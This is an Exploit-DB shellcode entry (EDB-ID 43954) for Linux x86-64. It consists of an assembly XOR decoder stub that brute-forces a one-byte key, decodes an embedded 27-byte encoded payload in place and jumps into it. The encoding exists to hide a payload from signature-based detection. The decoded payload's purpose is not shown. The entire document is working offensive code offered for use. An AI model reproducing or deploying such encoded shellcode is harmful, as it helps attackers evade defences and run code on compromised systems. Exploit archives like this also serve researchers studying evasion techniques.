EDB-ID: 43954 | Author: 0x4ndr3 | Published: 2017-12-16 | CVE: N/A | Type: Shellcode | Platform: Linux_x86-64 | Aliases: N/A | Advisory/Source: Link | Tags: N/A | Shellcode: Download / View Raw | |
section .text
_start:
jmp find_address ; jmp short by default
decoder:
; Get the address of the string
pop rdi
push rdi
pop rbx
; get the first byte and bruteforce till you get the token 0x90
mov byte dl, [rdi]
xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
bruteforce:
inc rdi
mov al,dl
xor al,dil
cmp al,0x90
jne bruteforce
push 27 ; shellcode length (given by encoder)
pop rcx
mov al,dil
push rbx
pop rdi
decode:
xor byte [rdi], al
inc rdi
loop decode
jmp rbx ; jmp to decoded shellcode
find_address:
call decoder
encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6